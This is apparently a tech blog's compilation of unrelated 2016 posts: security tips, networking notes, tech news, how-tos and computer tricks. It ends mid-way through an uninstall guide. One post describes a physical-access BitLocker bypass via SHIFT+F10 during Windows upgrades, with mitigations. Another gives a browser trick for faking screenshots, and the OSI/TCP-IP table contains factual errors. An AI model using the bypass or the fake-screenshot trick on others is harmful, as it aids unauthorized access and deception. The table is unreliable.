Five Ways to Spot an Internal Security Threat

A significant number of cybersecurity threats come from within an organization’s own network. Companies that devote substantial resources to detecting and preventing external attempts to hack their electronic networks often ignore the internal security threats that create a greater risk. Every organization’s cybersecurity policy should include mechanisms to detect and mitigate the five most common internal security problems.

 

 

1. Remote Access Software

Companies give employees the opportunity to work from home and to participate in meetings through remote access software, but that software provides an easy pathway for hackers to access a company’s networks. In one case study, a software company let its employees use TeamViewer software for online meetings. A spyware program that had slipped into one employee’s home computer, however, gave hackers a keystroke log that they then used to hack into the company’s network with the employee’s TeamViewer sign-in ID. Remote access software tools are convenient, but a company’s cybersecurity efforts needs to reflect added controls that are required to prevent the potential for abuses connected with that software.

2. Loss of Sensitive Information Through Email

Employees might intentionally or negligently attach confidential or proprietary documents and information to email that they send to external servers. Hackers can use those documents and that information as levers to delve deeper into an organization’s network. An organization can install scanning tools and other network monitors to watch the kind and quality of information that employees are sending outside of an internal email system. Employees who are intent on stealing information can encrypt it to defeat those tools, but those tools do provide a first level of defense against this type of internal threat.

3. Peer-to-Peer File Sharing

The greater trend in companies is to ban peer-to-peer file sharing over IM and other similar systems, but many vestiges of those systems remain and continue to pose significant cybersecurity risks for those companies. Every company’s cybersecurity policy needs to address this risk and, if feasible, to require the deletion of any peer-to-peer software that employees may be using to upload files or to share information.

4. Use of Insecure Wireless Networks

People use wireless networks to connect their mobile devices to the internet and to save their data allotments on those devices, but an unsecured network that has no password protection exposes every device on that network to every other device. Hackers have developed techniques to access sensitive information in mobile devices on those unsecured networks. A company’s cybersecurity policy should include instructions for all employees to turn off file sharing on mobile devices and to manage other privacy settings. Companies can also set up virtual private networks (“VPN’s”) on all employee mobile devices to add an additional layer of protection when employees use those devices on a public Wi-Fi network.

5. Blogging and Discussion Boards

Even an innocuous comment by an employee on a public message board can lead to deeper and more serious cybersecurity problems than a company might expect. An employee who posts a comment about his employer immediately identifies himself and his relationship with the employer. Hackers can build on that information to collect additional data about an employee, and the sum total of all of that data can give the hacker a platform to access the employer’s internal networks. Every corporate cybersecurity policy should include strict restrictions on the type of information that an employee can post on a public blog or discussion board.

All threats to an organization’s information systems and networks should be taken very seriously. Regarding internal threats, employees may have the best of intentions with respect to their actions, but those intentions can lead to egregious problems if they are not managed or curtailed properly.

Comparison of OSI Reference Model and TCP/IP Reference Model

Comparison of OSI Reference Model and TCP/IP Reference Model

Following are some major differences between OSI Reference Model and TCP/IP Reference Model, with diagrammatic comparison below.

OSI(Open System Interconnection)	TCP/IP(Transmission Control Protocol / Internet Protocol)
1. OSI is a generic, protocol independent standard, acting as a communication gateway between the network and end user.	1. TCP/IP model is based on standard protocols around which the Internet has developed. It is a communication protocol, which allows connection of hosts over a network.
2. In OSI model the transport layer guarantees the delivery of packets.	2. In TCP/IP model the transport layer does not guarantees delivery of packets. Still the TCP/IP model is more reliable.
3. Follows vertical approach.	3. Follows horizontal approach.
4. OSI model has a separate Presentation layer and Session layer.	4. TCP/IP does not have a separate Presentation layer or Session layer.
5. OSI is a reference model around which the networks are built. Generally it is used as a guidance tool.	5. TCP/IP model is, in a way implementation of the OSI model.
6. Network layer of OSI model provides both connection oriented and connectionless service.	6. The Network layer in TCP/IP model provides connectionless service.
7. OSI model has a problem of fitting the protocols into the model.	7. TCP/IP model does not fit any protocol
8. Protocols are hidden in OSI model and are easily replaced as the technology changes.	8. In TCP/IP replacing protocol is not easy.
9. OSI model defines services, interfaces and protocols very clearly and makes clear distinction between them. It is protocol independent.	9. In TCP/IP, services, interfaces and protocols are not clearly separated. It is also protocol dependent.
10. It has 7 layers	10. It has 4 layers

---

Diagrammatic Comparison between OSI Reference Model and TCP/IP Reference Model

KEY TERMS in Computer Networks

Following are some important terms, which are frequently used in context of Computer Networks.

Terms	Definition
1. ISO	The OSI model is a product of the Open Systems Interconnection project at the International Organization for Standardization. ISO is a voluntary organization.
2. OSI Model	Open System Interconnection is a model consisting of seven logical layers.
3. TCP/IP Model	Transmission Control Protocol and Internet Protocol Model is based on four layer model which is based on Protocols.
4. UTP	Unshielded Twisted Pair cable is a Wired/Guided media which consists of two conductors usually copper, each with its own colour plastic insulator
5. STP	Shielded Twisted Pair cable is a Wired/Guided media has a metal foil or braided-mesh covering which encases each pair of insulated conductors. Shielding also eliminates crosstalk
6. PPP	Point-to-Point connection is a protocol which is used as a communication link between two devices.
7. LAN	Local Area Network is designed for small areas such as an office, group of building or a factory.
8. WAN	Wide Area Network is used for the network that covers large distance such as cover states of a country
9. MAN	Metropolitan Area Network uses the similar technology as LAN. It is designed to extend over the entire city.
10. Crosstalk	Undesired effect of one circuit on another circuit. It can occur when one line picks up some signals travelling down another line. Example: telephone conversation when one can hear background conversations. It can be eliminated by shielding each pair of twisted pair cable.
11. PSTN	Public Switched Telephone Network consists of telephone lines, cellular networks, satellites for communication, fiber optic cables etc. It is the combination of world’s (national, local and regional) circuit switched telephone network.
12. File Transfer, Access and Management (FTAM)	Standard mechanism to access files and manages it. Users can access files in a remote computer and manage it.
13. Analog Transmission	The signal is continuously variable in amplitude and frequency. Power requirement is high when compared with Digital Transmission.
14. Digital Transmission	It is a sequence of voltage pulses. It is basically a series of discrete pulses. Security is better than Analog Transmission.

---

Twitter says it will ban Trump if he violates hate-speech rules

[caption id="" align="alignleft" width="536"] In this Aug. 20, 2016 file photo, then Republican presidential candidate Donald Trump speaks at a campaign rally in Fredericksburg, Va.. (AP Photo/Gerald Herbert, File)  (Copyright 2016 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistribu)[/caption]

Twitter has flexed its social media muscle lately, cracking down on hate-speech. And now the social network got a potentially bigger fish to fry -- President-elect Donald Trump. The nation's incoming Chief Executive has long been known to have a somewhat volatile Twitter account. Slashdot notes that earlier this week, the company told Slate that "it would consider banning key government officials, even the president, if its rules against hate speech or other language were violated."

You can imagine the hit the Twitter servers would take if this happened. "The Twitter Rules apply to all accounts," a spokesperson said. Interestingly, Facebook takes a different approach. According to Slate, despite employee objections, the normal Facebook community standards will not apply to Trump posts, given their newsworthiness and widespread support for his views.

More: Reddit CEO warns Trump subreddit will be banned if harassment continues

For the record, the American Bar Association defines hate speech as "Speech that offends, threatens, or insults groups, based on race, color, religion, national origin, sexual orientation, disability, or other traits."

This poses an interesting conundrum for one of social media's leading platforms. Look at the concepts in play here -- the company has issued set of policies that end users need to adhere to. That's nothing new, as all companies have a set of guidelines in one form or another. Sometimes, though, those policies conflict with the right of free speech. And then you have the obvious PR problem of potentially removing the account of the new President of the United States (we assume @RealDonaldTrump will just point to the dedicated account of @Potus from January 20 onward).

QZ.com said "Republicans have grown wary of Trump's unfiltered, potentially inflammatory tweets." Newt Gingrich is an adviser and vice-chairman of Trump's transition team, and said a recent tweet from the president-elect about illegal voters was "out of line." Gingrich added in USA Today, "The president of the United States can't randomly tweet without having somebody check it out. It makes you wonder about whatever else he's doing. It undermines much more than a single tweet."

 

Anonymous Hacktivist 'Barrett Brown' Released From Prison

Barrett Brown, a journalist, formerly served as an unofficial spokesman for the hacktivist collective Anonymous, finally walked free from prison on Tuesday morning after serving more than four years behind bars.

The Dallas-born investigative journalist was arrested in 2012 from his home while he was in the middle of an online chat after posting tweets and YouTube video threatening revenge against an FBI agent.

Brown, 35, initially attracted the law enforcement attention in 2011 when he shared a hyperlink to an IRC (Internet Relay Chat) channel where Anonymous members were distributing stolen information from the hack at security think tank Strategic Forecasting or Stratfor.

The hack allegedly exposed 200 gigabytes of data, which included email addresses and credit card information from Stratfor clients, including the US Army, US Air Force, and Miami Police Department.

Originally facing sentence to more than 100 years in prison, Brown was convicted in January 2015 under a plea agreement with prosecutors to almost five years in jail and nearly $900,000 in restitution and fines.

The two and a half years he has spent in pretrial confinement after his arrest were credited toward his total prison sentence.

Brown eventually pleaded guilty to three federal counts of obstructing a search warrant, making Internet threats and being an accessory to unauthorized access of a protected computer.

According to the Department of Justice, sharing the hyperlink was a crime because "by transferring and posting the hyperlink, Brown caused the data to be made available to other persons online, without the knowledge and authorization of Stratfor and the card holders."

On Tuesday, Brown was released from the Three Rivers Federal Correctional Institution in San Antonio, Texas, where he continued his work as a writer over the past year.

WikiLeaks Publishes 60,000 Emails From Contractor HBGary

On his release five months before the scheduled date, Former National Security Agency (NSA) subcontractor Edward Snowden tweeted his reaction, saying:

"Jailed since 2012 for his investigations, #BarrettBrown has finally been released from prison. Best of luck in this very different world."

Meanwhile, the whistleblower site WikiLeaks also published more than 60,000 emails from US private intelligence firm HBGary to celebrate Brown's release.

Hacktivist collective Anonymous initially obtained the emails in February 2011, but WikiLeaks published them in the form of a searchable database on Tuesday. Among other things, the leaked emails discussed targeting journalists and governments.

Rule 41 — FBI Gets Expanded Power to Hack any Computer in the World

Hacking multiple computers across the world just got easier for the United States intelligence and law enforcement agencies from today onwards.

The changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the United States Department of Justice came into effect on Thursday, after an effort to block the changes failed on Wednesday.The change grants the FBI much greater powers to hack into multiple computers within the country, and perhaps anywhere in the world, with just a single warrant authorized by any US judge (even magistrate judges). Usually, magistrate judges only issue warrants for cases within their jurisdiction.

That's the same the FBI did in its 2015 investigation into child pornography site Playpen, in which the agency hacked into some 8,700 computers across 120 different countries.The Supreme Court approved the changes to Rule 41 in April, allowing any U.S. judge to issue search warrants that give the FBI and law enforcement agencies authority to remotely hack computers in any jurisdiction, or even outside the United States.

Democratic Senator Ron Wyden attempted three times to block changes to Rule 41 that potentially risks people using Tor, a VPN, or some other anonymizing software to hide their whereabouts, but the efforts were blocked by Republican Senator John Cornyn of Texas.

The rule change should take effect on 1st December, today, barring surprises.

On the one hand, privacy advocates and legal experts have described the rule change as the extensive expansion of extraterritorial surveillance power that will allow agencies like the FBI to carry out international hacking operations with a lot less of a hassle.

On the other hand, the DOJ argued that the changes to the rule will help investigate modern internet criminals, allowing investigators access computers whose locations are "concealed through technological means," like the Tor anonymity network or VPNs (Virtual Private Networks), and devices used in botnets that have become powerful cyber weapons.

Assistant Attorney General Leslie Caldwell highlighted these concerns in a blog post published last week, saying if a criminal suspect is using Tor or VPN to hide its real location, it becomes tough for investigators to know his/her current location.

"So in those cases, the Rules do not clearly identify which court the investigators should bring their warrant application to," Caldwell said.

But what would happen if the FBI hacks the botnet victims, rather than the perpetrators? Or what if the government abuses this power to target nation states?

In a speech, Wyden said that the changes to Rule 41 amounted to "one of the biggest mistakes in surveillance policy in years," giving federal investigators "unprecedented authority to hack into Americans' personal phones, computers, and other devices," Reuters reports.

Other critics worry that the changes to Rule 41 would give the FBI unfettered ability to hack innocent users whose electronic devices have been infected with botnet malware without their knowledge, or anyone who keeps their identities private online.

To this concern, Caldwell argued that investigators accessing the devices of botnet victims "would, typically, be done only to investigate the extent of the botnet," or in order to "obtain information necessary to liberate victims’ computers from the botnet."

Caldwell further argued that the rule change would not allow the FBI to conduct "Mass Hacking;" in fact, failing to implement the rule change "would make it more difficult for law enforcement to combat mass hacking by actual criminals."

How to bypass BitLocker and Hack the Computer

If your computer's security relies on Windows BitLocker Hard Drive Encryption software, then Beware! Because anyone with physical access to your PC can still access your files within few seconds.

All an attacker need to do is hold SHIFT+F10 during Windows 10 update procedure.

Security researcher Sami Laiho discovered this simple method of bypassing BitLocker, wherein an attacker can open a command-line interface with System privileges just by holding SHIFT+F10 while a Windows 10 PC is installing a new OS build.

The command-line interface (CLI) then grants the attacker full access to the computer's hard drive, even when the victim has enabled BitLocker disk encryption feature.

Laiho explains that during the installation of a new build (Windows 10 upgrade), the operating system disables BitLocker while the Windows PE installs a new image of the main Windows 10 OS.

"The installation [Windows 10 upgrade] of a new build is done by reimaging the machine and the image installed by a small version of Windows called Windows PE (Preinstallation Environment)," Laiho says in his blog.

"This has a feature for troubleshooting that allows you to press SHIFT+F10 to get a Command Prompt. This sadly allows for access to the hard disk as during the upgrade Microsoft disables BitLocker."

 

Windows 10 in-place upgrades make this Issue Easy to Exploit

The SHIFT+F10 feature has existed with earlier versions of Windows as well, and could also be used to bypass BitLocker on Windows 7 and 8, but the feature has become a real flaw only with the advent of Windows 10's in-place upgrades.

The attacker needs physical access to the target computer during a relatively short time frame, bypass BitLocker encryption, and then gain administrator access to the device – the issue that may also affect Internet of Things (IoT) devices running Windows 10 as well.

Why is this worrying? Most of you have a bad habit of leaving your PC unattended during the Windows OS update procedure. It's also because Windows updates take very long to get installed.

During this time, any insider or threat actor (known or unknown to you) can open the CLI debugger interface and perform malicious tasks with the user admin privileges, despite BitLocker's presence, and that too without the need of any additional software.

"The real issue here is the Elevation of Privilege that takes a non-admin to SYSTEM (the root of Windows) even on a BitLocker (Microsoft's hard disk encryption) protected machine," Laiho adds. "And of course that this doesn't require any external hardware or additional software."

During his tests, Laiho successfully brought up the CLI troubleshooting interface while performing an update from Windows 10 RTM to version 1511 (November Update) or version 1607 (Anniversary Update), and during updates to any newer Windows 10 Insiders Build, up to the end of October 2016.

You can also watch the video demonstration of this attack on Laiho's blog.

Laiho informed Microsoft of the issue, and the company is working on a fix.

How to Mitigate this Issue?

As some countermeasures, Laiho recommended users not to leave their PCs unattended during the update procedure.

The Windows security expert also advised users to remain on Windows 10 LTSB (Long Time Servicing Branch) versions for the time being, as the LTSB versions of Windows 10 does not automatically do upgrades.

Windows 10 users with System Center Configuration Manager (SCCM) can block access to the command-line interface (CLI) during Windows update procedures by adding a file name DisableCMDRequest.tag to the %windir%\Setup\Scripts\ folder.

San Francisco’s transport agency has been hit by a hack attack which led to customers being able to travel for nothing.

The hackers have made a ransom demand of 100 Bitcoin, which amounts to about $70,000 (£56,000 ; €66,000).

As a precaution, staff shut off all ticketing machines on the network.

Computers across the city’s transport network, including at stations, were disabled with screens displaying a message from the attackers.

The message read: "You Hacked, ALL Data Encrypted. Contact For Key(cryptom27@yandex.com)ID:681 ,Enter”.

Yandex is a Russian internet company that, among other things, provides email and social networking tools.

The trains themselves were not affected - and city officials said a full investigation was underway.

'2,000 machines hacked'

"There has been no impact to the transit service, to our safety systems or to our customer's personal information,” a spokesman told the BBC.

"The incident remains under investigation, so it wouldn't be appropriate to provide any additional details at this point."

The Municipal Transportation Agency - known as Muni - looks after trains, trams and buses around the city, including San Francisco's iconic cable cars.

On Sunday, ticketing machines were back up - but it was not clear if the hack had been contained.

San Francisco news site Hoodline told the BBC the hacker had provided a list of machines he or she claimed to have infected in Muni's network - more than 2,000 in total.

It appeared to include many employee terminals as well as machines that may be used to look after payroll and employees’ personal information.

The hacker told Hoodline on Sunday that Muni had “one more day” to make a deal.

How do I password protect my files and folders in Windows?

Because most versions of Windows do not include a method of password protecting your files and folders, this page provides steps on encrypting files and folders instead. To password protect your files and folders in Windows, you need to use a third-party program.

Tip: Before password protecting any document, you may want to create a backup of the non-password protected files and folder in case you forget the password in the future.

Microsoft Windows Vista, 7, 8, and 10 users
Microsoft Windows XP Professional users
Microsoft Windows XP Home users
Other security solutions for protecting your files and folders in Windows
How to password protect an Excel file
Things to remember when encrypting or password protecting files and folders

Microsoft Windows Vista, 7, 8, and 10 users

Unfortunately, Windows Vista, Windows 7, and Windows 8 do not provide any features for password protecting files or folders. You need to use a third-party software program to accomplish this.

If you want to encrypt a file or folder, this can be done by following these steps:

1. Select the file or folder you want to encrypt.


2. Right-click the file or folder and select Properties.


3. On the General tab, click the Advanced button.


4. Check the box for the "Encrypt contents to secure data" option.


5. Click Apply and then OK.

Note: If the "Encrypt contents to secure data" option is not selectable and grayed out or you do not see the option at all, you have a version of Windows that does not support this feature. It is also possible that the hard drive where the files are located is not formatted as NTFS, as this is a requirement for the encryption feature.

Microsoft Windows XP Professional users

The steps below for encrypting the files on Windows XP Professional apply to users who are using a computer that has two or more accounts. If you are using a single account, see the other security solutions section.

1. Select the file or folder you want to encrypt.


2. Right-click the file or folder and click Properties.


3. On the General tab, click the Advanced button.


4. Check "Encrypt contents to secure data" option.


5. Click Apply and then OK.

Note: You will not be prompted to enter a password when encrypting a folder in Windows XP Pro. However, other user accounts on your computer will not have access to files contained in the encrypted folder.

Encrypt contents to secure data is grayed out

If you are using the Home edition of Microsoft Windows XP, see the Windows XP Home steps.

Show "Encrypt" on the context menu

The newest version of TweakUI also enables you to show the Encrypt option in the context menu. To do this, follow the steps below.

1. Open TweakUI.


2. In the TweakUI window, select Explorer.


3. In the right side of the window under Settings, locate Show 'Encrypt' on context menu and check the box. This option should be below Prefix 'shortcut to' on new shortcuts and above Show 'View workgroup computers' in NetPlaces.

• I'm missing Show "Encrypt" on the context menu in TweakUI.

Microsoft Windows XP Home users

1. Select the file or folder you want to encrypt.


2. Right-click the file or folder and click Properties.


3. Click the Sharing tab.


4. Check the box Make this folder private


5. Click Apply and then OK.

Make this folder private is grayed out

For this option to work on Microsoft Windows XP Home edition, you must meet the below requirements.

1. The hard drive must be formatted in NTFS and not FAT32 File System.


2. The folder you are attempting to encrypt is your own personal folder. For example, if your name is Bob, you must be encrypting the following folder or a folder that is contained within the following folder:C:\Documents and Settings\Bob\
   
   You cannot encrypt any folders outside of this folder. If you want to encrypt folders outside of this folder, see the other security solutions section below.

Other security solutions for protecting your files and folders in Windows

File and folders not frequently used - An easy way to password protect files is to create an archive of the files using a compression tool. When the archive is created, you can encrypt the contents by specifying a password.

Windows ME and Windows XP users - Windows ME and Windows XP come with their own compression utility. This utility can also be used to compress and password protect files.

Windows Vista and Windows 7 users - Windows Vista and Windows 7 also include a compression utility. However, password protection for the compressed files is not possible without the use of a third-party software program.

Tip: When a file is compressed, users can still view a listing of the files in the compressed file. If you want both your file names and the contents to be hidden, move all the files into a single folder and password protect that folder.

File and folders frequently used or accessed

If you need to password protect or encrypt data you frequently use, you need to install a third-party program that allows you to protect your files and folders. Below are some free and commercial solutions.

• 7-Zip - A free file and folder zipping utility, which also includes the ability to password protect zipped files and folders.


• AxCrypt - An excellent free encryption utility that enables users to encrypt all files within a folder and not allow those files to be viewed unless a passphrase (password) is known.


• Folder Guard - A commercial version of a password protection software that enables you to password protect files, folders, and other Windows resources.


• Protected Folder- For a small fee, it's an excellent software program that enables you to password protect folders.

Click here to search for more solutions to password protect files and folders in Windows.

Things to remember when encrypting or password protecting files and folders

1. There is no such thing as a 100% protected file. There are numerous tools, utilities, and instructions for how to break encryption and passwords on files. However, the protection methods listed above will protect your files from the majority of users who may encounter them. If you are working with really sensitive data, we suggest a commercial product for protecting your files and data.


2. Even though a file or folder may be password protected, it still can be deleted (unless the program supports the ability to protect files from being deleted). Always remember to backup all your files, even those protected by passwords.


3. If you forget the password, unless you're willing to spend the time attempting to break it or pay someone else to break the password, all the data in the file or folder will be lost. Thus, it is important to backup a copy of the non-password protected files or folders, just in case.

WHATSAPP VIDEO CALLS ARE NOW AVAILABLE TO EVERYONE

When WhatsApp finally got a voice calling feature last year it left us with just one question: when do we get video? Well, now it's underway. According to the WhatsApp blog, the feature is gradually rolling out for all users across the various platforms in the coming days. Read on for more on how to make WhatsApp video calls.

• WhatsApp tips and tricks


• WhatsApp problems and solutions

How to make WhatsApp video calls

Making a video call is just like making an audio call: open a call chat with the person you want to contact and then select the Video Call option. The other person, for now, will also need to have video calling for it to work otherwise you'll get an error message.

Once the call is launched, you can see and hear your correspondent. It will take us further testing to see the actual video quality but at first glance it looks pretty good. In our test, my colleague Luis used a Xiaomi Redmi 3 and I used a Nexus 6P, so rather good smartphones.

WhatsApp Messenger

Just choose audio or video calls. / © AndroidPIT

With a simple tap on the screen, you can access your messages, for example within the application, or return to the menu and use your smartphone for other purposes while continuing your call. Of course, if you do not keep the display of the call on the screen you can not see the caller but only hear the audio. To see him/her again, simply reopen the window.

You can download the latest version of WhatsApp version 2.16.318 here. But remain patient, the feature is rolling out to all users (not just beta users anymore) in the coming days. Uninstalling and reinstalling the app or clearing the cache won't do you any good. You just have to wait.

• How to send files of any type with WhatsApp


• Check out the WhatsApp blog

Alternatives to WhatsApp video calling

If you don't like WhatsApp video calls (or can't stand the wait) then you can try out one of its many rivals. Alternative apps like Viber are excellent. In fact, it is one of the best instant messenger apps for Android.

In the case of Viber, making a video call means making a voice call first. Select your contact, tap the Free Call button, and wait for the call to connect. Once it connects, you’ll need to tap the Video Call button to move into video calling mode, and the person you’re calling needs to activate it too or you won’t be able to see him, her or them.

You can do the same thing in Skype for Android – there’s a button you can use to turn the video on or off during a call – but unlike Viber you don’t need to initiate a voice call first if you don’t want to. All you need to do is sign in, tap the contact you want to video call and then tap on the video call.

What do you think of WhatsApp video calling? Let us know in the comments.

Best Tricks every Computer User should know.

Get back that tab you accidentally closed.

Windows: Ctrl + Shift + T

Mac : Command + Shift +T

Open a link in a new browser tab with one click.

If you click the "middle" button on your mouse, you will open the link in a new browser tab. And if you middle-click an open tab, it will close it.

Make a copy of a file by just dragging it.

All you have to do to make a copy of a file on a Mac is hold the "Alt" key ("Control" if you are using a PC) and then click and drag the file. This will make a copy that you can drop anywhere you want by un-clicking.

Pause YouTube with one click, or skip backward and forward 10 seconds.

Most people know you can hit the space bar to pause a YouTube video, but sometimes this causes it to scroll down the page if you haven't already clicked on the video. If you press "K," this will play (or pause) the video every time.

Hitting the "J" key will cause you to go backward 10 seconds, while hitting the "L" key will make you go forward 10 seconds.

Move your window to any side of the screen, or to the next monitor.

If you click the "Windows" key, plus one of the arrows (right, left, up, down), your current window will move to that side of the screen.

Similarly, "Windows," plus "Shift," plus one of the arrows will move your window into whatever monitor is that way (right, for example).

Unfortunately, this only works for Windows machines.

Clear you cache in seconds.

Quickly clear your cache by pressing "Control," plus "Shift," plus "R." This will also refresh your page.

Lock your computer in seconds.

On a Windows machine, hit "Windows," plus  "L" to lock your computer. This can be fun for pranks.

On a Mac click "Command," plus "Option," plus "Eject." (Or "Power" if your computer doesn't have an optical drive.)

Freak people out by rotating their screen.

If you press "Control" plus "Alt" plus one of the arrow keys, it will rotate your screen that way. Note: this doesn't work for all computers (and only on Windows), but when it does, it can seriously freak someone out.

Turn your browser window into a simple text editor.

If you want to bring up a basic text editor you can type in, just paste this into the address bar in your browser:

data:text/html, <title>GetRwanda Text Editor</title><body contenteditable style="font-size:2rem;font-family:georgia;line-height:1.4;max-width:60rem;margin:0 auto;padding:4rem;">

Edit what you Chrome browser looks like.

If you want to play a trick on someone, and send them a fake screenshot of something that never existed, there's an easy way in Chrome. First you bring up the console by pressing "F12."

Then you enter: document.designMode = "on"

After this, you can edit any of the text that appears on the screen.

Reset your browser so it's not zoomed in.

Here are three ways to deal with zooming in your web browser:

• "Control" (or "Command" on Mac) plus "0" resets it to default


• "Control" (or "Command" on Mac) plus "+" zooms in


• "Control" (or "Command" on Mac) plus "-" zooms out

 

Please write down in comment for any suggestion or Question

Facebook tried to buy Asian Snapchat clone Snow

Here’s fuel to the fire for those who believe that Facebook will buy anything that looks, smells or moves like Snapchat. The U.S. social networking giant this summer made an unsuccessful bid to acquire Snow, a Snapchat-like service from Naver, the $25 billion-valued Korean firm behind chat app Line, a source close to the company told TechCrunch.

Snow currently has around 80 million downloads, and it is adding around 10 million more each month, according to the source. That growth has also encouraged acquisition interest from Tencent — the maker of blockbuster chat app WeChat — Alibaba and others, TechCrunch understands.

“It’s true that Snow is receiving love calls from various companies,” a representative from Naver told us in a statement. Despite acknowledging outside interest, Naver did not name Snow’s would-be suitors.

Facebook did not respond to requests for comment.

The app first grabbed attention in the summer when it raced up Android and iOS app store rankings in Korea, Japan and China, collecting some 30 million downloads. A feature story from The New York Times in July, which explained that Snow and Naver were exploiting Snapchat’s apparent lack of interest in Asia, only served to heighten awareness of the app.

Sometime after that story, Facebook CEO Mark Zuckerberg got wind of Snow and contacted Naver Chairman Hae-Jin Lee over the phone with an offer to acquire it. Naver saw Line raise over $1 billion in a dual Japan-U.S. IPO in July of this year, and Lee rejected Facebook’s overtures because he believes Snow has the potential to become a similar success.

Indeed, Naver strengthened ties between the two services in September when Line made a $45 million investment in Snow that gave the social app a valuation of $180 million — not bad for a one-year-old project. With Line struggling to grow its userbase outside of its largest markets of Japan, Thailand and Taiwan, Snow is viewed as a key ally that could help the chat app broaden its appeal in more parts of Asia.

While it is easy to label Snow as a Snapchat clone, the app does have some differentiated features.

For one thing, Naver has worked hard to localize the service in markets, much the same way as it did with Line when the chat app emerged in 2011-2012. Most notably, it is working with celebrities in Korea and Japan, where it sees the most traction and potential, to feature their stories prominently inside the app alongside live streams, too. That helps encourage users back into the app for more reasons than simply to message their friends, while it also may unlock monetize options in the future.

The app itself has over 36 filters and more than 200 masks, offering considerably more customization options than Snapchat — a move that is in line with appealing to its core audience in Asia. Some options include filters for both images and videos that involve celebrities, cartoon characters, fairies and even one scene as a drunken ‘salary man’ making a toast.



Snapchat — now just ‘Snap’ — is widely reported to be gearing up for an IPO next year thatcould value the company at around $25 billion. The latest suggestion is that it could raise $4 billion from a listing.

Those figures certainly vindicate CEO Evan Spiegel’s decision to reject a $3 billion bid from Facebook three years ago — even if conventional wisdom at the time suggested he was making a mistake.

It is still early days for Snow, and it remains to be seen whether this will be another app that Facebook will rue missing out on over time.

For now, Facebook is trying to turn its own properties into Snapchat-like competitors using heavy doses of ‘product inspiration’.

Instagram Stories, a feature that the company admits is inspired by Snapchat, reached a very respectable 100 million users within two months, while Facebook has launched smaller projects that include a social video app that’s just for teens, a Snapchat-like camera feature, and a fairly blatant Snapchat clone that is being tested in Poland.

Apple unveils the new Touch Bar-powered MacBook Pro

Apple on Thursday revealed its newest MacBook Pro laptop, which includes a new interactive, customizable touch strip above the keyboard called Touch Bar.

"The Mac is more than a product to us," CEO Tim Cook told the crowd at the Town Hall auditorium at the company's Cupertino, California, headquarters. "It's a testament to everything we do and everything we create at Apple."

Instead of including a full-blown touchscreen like most new Windows computers, Apple offered up the Touch Bar. The bar lights up with a menu of buttons, control sliders, dials and tools, which change with the app you're using. Taking the place of function keys, the Touch Bar brings up autofill choices as you type, lets you edit videos in Final Cut Pro or straighten photos in the Photos app. Users can also customize the Touch Bar by dragging and dropping new tools into it.

The new MacBook Pro is also the first Mac to include Touch ID. That feature was added right into the Touch Bar where the power button has been located. It allows users to log into their devices with their thumbprints (you can also have multiple accounts for shared family computers) and securely pay for items online with Apple Pay.

Apple is hoping these new MacBook Pros will reinvigorate its computer sales amid a bruising downturn in the PC market. The company is also facing new competition from Microsoft, which on Wednesday revealed the new Surface Studio all-in-one desktop computer and has bulked up its line of Surface devices.

"Apple's laptops no longer enjoy the kind of big hardware advantage they've had in the past," said analyst Jan Dawson of Jackdaw Research on Thursday. He said the big difference he sees now is the "philosophical approach" between Apple and Microsoft of offering a touchscreen PC or not.

There are two sizes of the new MacBook Pro. The 13-inch model of the MacBook Pro is 14.9mm thick, weighs 3 pounds and starts at $1,799. The 15-inch model is 15.5mm thick, weighs 4 pounds and starts at $2,399. That's compared to 18mm for the previous 13- and 15-inch Pros, which were both about a half pound heavier than their replacements.

There is also another 13-inch MacBook Pro without Touch Bar and Touch ID, priced at $1,499. While Apple will continue to produce the 13-inch MacBook Air, it positioned this lower-tier MacBook Pro as a potential replacement.

Additionally, the new MacBook Pros include larger trackpads, refined keyboard designs, brighter displays that consume less energy, and redesigned speakers. Overall, the new MacBooks have about 10 hours of battery life, equal to the older 13-inch MacBook Pros and an hour longer than the older 15-inch machines.

Ahead of Thursday's event, rumors circulated about a new MacBook Pro with an OLED touch bar above the keyboard.

Apple's line of MacBook laptops and iMac desktops has faced double-digit declines in sales for most of the past year. Mac's weakness comes at a bad time for the company, since the iPhone -- Apple's biggest moneymaker -- has also seen three straight quarters of weaker sales and its iPad tablet business is struggling to keep up growth.

Apple's last big change to the MacBook line came in March 2015, when the tech giant revealed the new MacBook, a super-slim laptop with a force-sensitive track pad and just two ports, a USB-C port and headphone jack. During that March product event, Apple also updated the MacBook Pro and MacBook Air with faster processors.

While these devices failed to re-energize sales, the Mac line remains a very important one for Apple, not just because it was founded as a personal-computer company. Macs continue to generate billions of dollars in sales for Apple, helping the company diversify its revenue and avoid relying too heavily on the iPhone.

8 Ways to remove programs and modern apps in Windows

From time to time, I stumble upon applications that are hard to remove. Sometimes their Add/Remove Programs entry disappears for whatever reason or they don’t have a handy Uninstall shortcut available, and so on. The problems vary from case to case. That’s why I decided to make a roundup of all the methods that can be used to remove both desktop programs and modern apps, in Windows.

NOTE: This guide applies to Windows 7, Windows 8.1 and Windows 10.

1. Uninstall desktop applications from the Control Panel

This is the method most people know about. It works great for all desktop applications but it cannot be used for modern apps that are distributed through the Windows Store in Windows 8.1 and Windows 10.

First open the Control Panel. If you don’t know how, here are some guides to help you:

• 8 Ways To Start The Control Panel In Windows 10


• Introducing Windows 8.1: 9 Ways to Access the Control Panel

Then go to “Programs -> Programs and Features”.



Select the desktop application that you want to remove, click or tap Uninstall and follow the wizard.



Please remember that the steps involved in removing a program are different from program to program.

2. Uninstall desktop programs using their Uninstall shortcuts

Some desktop applications, when installed, create an Uninstall shortcut. This is generally found in the application’s folder in the Start Menu (in Windows 7 and Windows 10) or the Apps View (in Windows 8.1). Below you can see theUninstall shortcut for Dropbox, in Windows 8.1.



Here is the Uninstall shortcut for Fitbit Connect, in Windows 10.



Click the Uninstall shortcut to start the uninstallation wizard for the selected application.

Please keep in mind that Uninstall shortcuts are sometimes also placed on the Desktop. Double-click on them to start the uninstall procedure.

3. Uninstall desktop apps using their Uninstall.exe

Many desktop apps (especially those which create Uninstall shortcuts) have an executable file named uninstall.exe or something along these lines. This file is always found in the installation folder of that application. You can see below the uninstall.exe file for the VLC Player.



Run it and follow the steps required to uninstall the program.

4. Uninstall desktop apps using their setup MSI file

Some programs (like the 64-bit version of 7-Zip) do not use a setup.exe file for their installation. Instead their setup file has the extension ".msi". This format is used by the Windows Installer, a special installation format created by Microsoft for its Windows operating systems. The desktop applications that use an ".msi" installer are very easy to uninstall. You right click or press and hold on their setup file and click or tap Uninstall.



